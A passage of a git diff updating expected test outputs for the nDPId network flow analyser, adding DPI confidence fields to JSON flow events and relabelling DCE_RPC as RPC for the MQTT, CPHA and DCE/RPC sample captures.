+00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1922,"flow_first_seen":1455907243976,"flow_last_seen":1455907286855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
+00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1926,"flow_first_seen":1455907258332,"flow_last_seen":1455907286855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
+00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1919,"flow_first_seen":1455907271483,"flow_last_seen":1455907286855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
+00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1928,"flow_first_seen":1455907267002,"flow_last_seen":1455907286845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61855,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
 00160{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","total-events-serialized":89}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 8516/8514
@@ -95,10 +95,10 @@
 ~~ total active/idle flows...: 16/16
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4867927 bytes
-~~ total memory freed........: 4867927 bytes
-~~ total allocations/frees...: 108116/108116
+~~ total memory allocated....: 4947960 bytes
+~~ total memory freed........: 4947960 bytes
+~~ total allocations/frees...: 109706/109706
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 165 chars
-~~ json string max len.......: 716 chars
-~~ json string avg len.......: 509 chars
+~~ json string max len.......: 825 chars
+~~ json string avg len.......: 564 chars
diff --git a/test/results/cpha.pcap.out b/test/results/cpha.pcap.out
index b384afb70..e0b7dac80 100644
--- a/test/results/cpha.pcap.out
+++ b/test/results/cpha.pcap.out
@@ -1,8 +1,8 @@
 00436{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"cpha.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603354463286,"flow_last_seen":1603354463286,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1603354463286,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"172.21.3.0","src_port":8116,"dst_port":8116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1603354463286,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":96,"pkt_l4_len":58,"ts_msec":1603354463286,"pkt":"AQBeFQMBAAAAAAEBgQAAFQgARQAATgAAAAD\/EQyKAAAAAKwVAwAftB+0ADpJ\/BqQDDEnhQABABZ5PgAB\/\/7gSgEAAAIAAQAACAoAAgADAAQAAAIECQAAAAkAAAAAAAIA"}
-00586{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603354463286,"flow_last_seen":1603354463286,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1603354463286,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"172.21.3.0","src_port":8116,"dst_port":8116,"l4_proto":"udp","ndpi": {"proto":"CPHA","breed":"Fun","category":"Network"}}
-00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603354463286,"flow_last_seen":1603354463286,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1603354463286,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"172.21.3.0","src_port":8116,"dst_port":8116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"CPHA","breed":"Fun","category":"Network"}}
+00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603354463286,"flow_last_seen":1603354463286,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1603354463286,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"172.21.3.0","src_port":8116,"dst_port":8116,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CPHA","breed":"Fun","category":"Network"}}
+00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603354463286,"flow_last_seen":1603354463286,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1603354463286,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"172.21.3.0","src_port":8116,"dst_port":8116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CPHA","breed":"Fun","category":"Network"}}
 00151{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1/1
@@ -12,10 +12,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594858 bytes
-~~ total memory freed........: 4594858 bytes
-~~ total allocations/frees...: 99554/99554
+~~ total memory allocated....: 4679811 bytes
+~~ total memory freed........: 4679811 bytes
+~~ total allocations/frees...: 101144/101144
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 156 chars
-~~ json string max len.......: 630 chars
-~~ json string avg len.......: 448 chars
+~~ json string max len.......: 656 chars
+~~ json string avg len.......: 460 chars
diff --git a/test/results/dcerpc.pcap.out b/test/results/dcerpc.pcap.out
index fd011daa4..b811d567b 100644
--- a/test/results/dcerpc.pcap.out
+++ b/test/results/dcerpc.pcap.out
@@ -1,26 +1,26 @@
 00438{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dcerpc.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709979,"flow_last_seen":1602860709979,"flow_idle_time":180000,"flow_min_l4_payload_len":642,"flow_max_l4_payload_len":642,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":642,"midstream":0,"ts_msec":1602860709979,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49155,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01296{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1602860709979,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":684,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":684,"pkt_l4_len":650,"ts_msec":1602860709979,"pkt":"AA7wSJ4FABwGCybtCABFAAKeAX4AAB4RFWLAqAELwKgBFMADiJQCip8cBAAgAAAAAADeoAAAbJcR0YJxAAEBAQFN3qAAAWyXEdGCcQCgJELffTX9qQA1ihISgAQAHAYLJu0AAAAAAAAAAQAAAAAAAP\/\/\/\/8CMgAAAAAAAAMtAAACHgAAAy0AAAAAAAACHgEBAEQBAAABCfGlMMdfbUe2f4BzQ53qrQACABwGCybt3qAAAGyXEdGCcQBkAQ0AKgAAABECWIiSAA5wbGN4YmtvbnRyNzRiNwECAGgBAAABAAGIkgAAAAIAKIAAACAAAgABAAD\/\/\/\/\/AAMAA8AAAAAAAAAAAAEAAAAAAAcAAAABAAAAAIAAAAEAAIABAAIAAIACAAMAAQABAAQAAgABAAYAAwABAAkAAgACAAEACAAEAAEACwECAGgBAAACAAKIkgAAAAIAKIAQACAAAgABAAD\/\/\/\/\/AAMAA8AAAAAAAAAAAAEAAAAAAAIAAgABAAYABAABAAkABwAAAAEAAAAAgAAAAQAAgAEAAgAAgAIAAwABAAEABAACAAEABQADAAEACAEEAEoBAAABAAAAAAAAAAAEBgAAAAQAAQAAAAEAAAABAAABAYAAAAAAAgAAAAEAAAEBgAEAAAADAAAAAQAAAQGAAgAAAAMAAAABAAABAQEEACABAAABAAAAAAABAQAA2AAAAAEAAQAAAAEAAQABAAEBAQEEACYBAAABAAAAAAACCAgABAAAAAEAAQAAAAEAAwABAAEBAQACAAEBAQEEACABAAABAAAAAAADCAAAAgAAAAEAAQAAAAEAAQABAAEBAQEEACABAAABAAAAAAAEAAgAUgAAAAEAAQAAAAEAAgACAAEBAQEDABYBAAABiJIAAAAAAAEAAwAAAQDAAKAA"}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709979,"flow_last_seen":1602860709979,"flow_idle_time":180000,"flow_min_l4_payload_len":642,"flow_max_l4_payload_len":642,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":642,"midstream":0,"ts_msec":1602860709979,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49155,"dst_port":34964,"l4_proto":"udp","ndpi": {"proto":"DCE_RPC","breed":"Acceptable","category":"RPC"}}
+00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709979,"flow_last_seen":1602860709979,"flow_idle_time":180000,"flow_min_l4_payload_len":642,"flow_max_l4_payload_len":642,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":642,"midstream":0,"ts_msec":1602860709979,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49155,"dst_port":34964,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}}
 01296{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1602860709979,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":684,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":684,"pkt_l4_len":650,"ts_msec":1602860709979,"pkt":"AA7wSJ4FABwGCybtCABFAAKeAX4AAB4RFWLAqAELwKgBFMADiJQCip8cBAAgAAAAAADeoAAAbJcR0YJxAAEBAQFN3qAAAWyXEdGCcQCgJELffTX9qQA1ihISgAQAHAYLJu0AAAAAAAAAAQAAAAAAAP\/\/\/\/8CMgAAAAAAAAMtAAACHgAAAy0AAAAAAAACHgEBAEQBAAABCfGlMMdfbUe2f4BzQ53qrQACABwGCybt3qAAAGyXEdGCcQBkAQ0AKgAAABECWIiSAA5wbGN4YmtvbnRyNzRiNwECAGgBAAABAAGIkgAAAAIAKIAAACAAAgABAAD\/\/\/\/\/AAMAA8AAAAAAAAAAAAEAAAAAAAcAAAABAAAAAIAAAAEAAIABAAIAAIACAAMAAQABAAQAAgABAAYAAwABAAkAAgACAAEACAAEAAEACwECAGgBAAACAAKIkgAAAAIAKIAQACAAAgABAAD\/\/\/\/\/AAMAA8AAAAAAAAAAAAEAAAAAAAIAAgABAAYABAABAAkABwAAAAEAAAAAgAAAAQAAgAEAAgAAgAIAAwABAAEABAACAAEABQADAAEACAEEAEoBAAABAAAAAAAAAAAEBgAAAAQAAQAAAAEAAAABAAABAYAAAAAAAgAAAAEAAAEBgAEAAAADAAAAAQAAAQGAAgAAAAMAAAABAAABAQEEACABAAABAAAAAAABAQAA2AAAAAEAAQAAAAEAAQABAAEBAQEEACYBAAABAAAAAAACCAgABAAAAAEAAQAAAAEAAwABAAEBAQACAAEBAQEEACABAAABAAAAAAADCAAAAgAAAAEAAQAAAAEAAQABAAEBAQEEACABAAABAAAAAAAEAAgAUgAAAAEAAQAAAAEAAgACAAEBAQEDABYBAAABiJIAAAAAAAEAAwAAAQDAAKAA"}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709993,"flow_last_seen":1602860709993,"flow_idle_time":180000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":170,"midstream":0,"ts_msec":1602860709993,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49161,"dst_port":49155,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1602860709993,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1602860709993,"pkt":"ABwGCybtAA7wSJ4FCABFAADGAAUAAB4RGLPAqAEUwKgBC8AJwAMAsvR9BAIKABAAAAAAAKDel2zREYJxAAEBAQFNAQCg3pds0RGCcQCgJELffQCp\/TWKNRISgAQAHAYLJu0AAAAAAQAAAAAAAAAAAP\/\/\/\/9aAAAAAAAAAAAARgAAAC0DAAAAAAAARgAAAIEBAB4BAAABCfGlMMdfbUe2f4BzQ53qrQACAA7wSJ4FiJKBAgAIAQAAAQABgACBAgAIAQAAAgACgBCBAwAIAQAAAQAUBZg="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709993,"flow_last_seen":1602860709993,"flow_idle_time":180000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":170,"midstream":0,"ts_msec":1602860709993,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49161,"dst_port":49155,"l4_proto":"udp","ndpi": {"proto":"DCE_RPC","breed":"Acceptable","category":"RPC"}}
+00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709993,"flow_last_seen":1602860709993,"flow_idle_time":180000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":170,"midstream":0,"ts_msec":1602860709993,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49161,"dst_port":49155,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1602860709993,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1602860709993,"pkt":"ABwGCybtAA7wSJ4FCABFAADGAAUAAB4RGLPAqAEUwKgBC8AJwAMAsvR9BAIKABAAAAAAAKDel2zREYJxAAEBAQFNAQCg3pds0RGCcQCgJELffQCp\/TWKNRISgAQAHAYLJu0AAAAAAQAAAAAAAAAAAP\/\/\/\/9aAAAAAAAAAAAARgAAAC0DAAAAAAAARgAAAIEBAB4BAAABCfGlMMdfbUe2f4BzQ53qrQACAA7wSJ4FiJKBAgAIAQAAAQABgACBAgAIAQAAAgACgBCBAwAIAQAAAQAUBZg="}
 01720{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1602860710012,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":995,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":995,"pkt_l4_len":961,"ts_msec":1602860710012,"pkt":"AA7wSJ4FABwGCybtCABFAAPVAX8AAB4RFCrAqAELwKgBFMADiJQDwWYXBAAgAAAAAADeoAAAbJcR0YJxAAEBAQFN3qAAAWyXEdGCcQCgJELffTX9qQA1ihISgAQAHAYLJu0AAAAAAAAAAQAAAAEAA\/\/\/\/\/8DaQAAAAAAAANVAAADVQAAA1UAAAAAAAADVQAIADwBAAAACfGlMMdfbUe2f4BzQ53qrf\/\/\/\/\/\/\/\/\/\/AADgQAAAAxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAA8AQAAAQnxpTDHX21Htn+Ac0Od6q0AAAAAAAAAAQAAAAEAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIQAfADEAAAAACAA8AQAAAgnxpTDHX21Htn+Ac0Od6q0AAAAAAACAAAAAgFEAAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAhMAGAEAAADD1of+eJ4Doazb5b\/LvCe2AAAAAAAIADwBAAADCfGlMMdfbUe2f4BzQ53qrQAAAAAAAIAAAACAUgAAACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACEQAkAQAAAMPWh\/54ngOhrNvlv8u8J7YAAAAAC21ycGRvbWFpbi0xAAgAPAEAAAQJ8aUwx19tR7Z\/gHNDneqtAAAAAAACAAEAAAABAAAACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEABwdRAAAAAAAAAAAIADwBAAAFCfGlMMdfbUe2f4BzQ53qrQAAAAAAAgABAAAAAgAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBgEA\/wAAAAAIADwBAAAGCfGlMMdfbUe2f4BzQ53qrQAAAAAAAgABAAAAAwAAAAkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAQEBAQEBAQEAAAAACAA8AQAABwnxpTDHX21Htn+Ac0Od6q0AAAAAAAMAAQAAAAEAAAAKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAHAVEAAAAAAAAAAAgAPAEAAAgJ8aUwx19tR7Z\/gHNDneqtAAAAAAADAAEAAAACAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEGAQD\/AAAAAAgAPAEAAAkJ8aUwx19tR7Z\/gHNDneqtAAAAAAAEAAEAAAABAAAACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEABgQAAAAAAP8AAAAIADwBAAAKCfGlMMdfbUe2f4BzQ53qrQAAAAAABAABAAAAAgAAAAkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAQEBAQEBAQE="}
 01517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1602860710024,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":846,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":846,"pkt_l4_len":812,"ts_msec":1602860710024,"pkt":"ABwGCybtAA7wSJ4FCABFAANAAAYAAB4RFjjAqAEUwKgBC8AJwAMDLC54BAIKABAAAAAAAKDel2zREYJxAAEBAQFNAQCg3pds0RGCcQCgJELffQCp\/TWKNRISgAQAHAYLJu0AAAAAAQAAAAEAAAADAP\/\/\/\/\/UAgAAAAAAAAAAwAIAAFUDAAAAAAAAwAIAAIAIADwBAAAACfGlMMdfbUe2f4BzQ53qrf\/\/\/\/\/\/\/\/\/\/AADgQAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACACAA8AQAAAQnxpTDHX21Htn+Ac0Od6q0AAAAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAgAPAEAAAIJ8aUwx19tR7Z\/gHNDneqtAAAAAAAAgAAAAIBRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAIADwBAAADCfGlMMdfbUe2f4BzQ53qrQAAAAAAAIAAAACAUgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACACAA8AQAABAnxpTDHX21Htn+Ac0Od6q0AAAAAAAIAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAgAPAEAAAUJ8aUwx19tR7Z\/gHNDneqtAAAAAAACAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAIADwBAAAGCfGlMMdfbUe2f4BzQ53qrQAAAAAAAgABAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACACAA8AQAABwnxpTDHX21Htn+Ac0Od6q0AAAAAAAMAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAgAPAEAAAgJ8aUwx19tR7Z\/gHNDneqtAAAAAAADAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAIADwBAAAJCfGlMMdfbUe2f4BzQ53qrQAAAAAABAABAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACACAA8AQAACgnxpTDHX21Htn+Ac0Od6q0AAAAAAAQAAQAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710063,"flow_last_seen":1602860710063,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1602860710063,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49162,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1602860710063,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"ts_msec":1602860710063,"pkt":"ABwGCybtAA7wSJ4FCABFAACgAAgAAB4RGNbAqAEUwKgBC8AKiJQAjEB6BAAgABAAAAAAAKDel2zREYJxAGQBDQAqAgCg3pds0RGCcQCgJELffYDI+0MAABAQgAAADvBIngUAAAAAAQAAAAAAAAAEAP\/\/\/\/80AAAAAACgAAAAIAAAAKAAAAAAAAAAIAAAAAESABwBAAAACfGlMMdfbUe2f4BzQ53qrQACAAAAAgAA"}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710063,"flow_last_seen":1602860710063,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1602860710063,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49162,"dst_port":34964,"l4_proto":"udp","ndpi": {"proto":"DCE_RPC","breed":"Acceptable","category":"RPC"}}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710063,"flow_last_seen":1602860710063,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1602860710063,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49162,"dst_port":34964,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}}
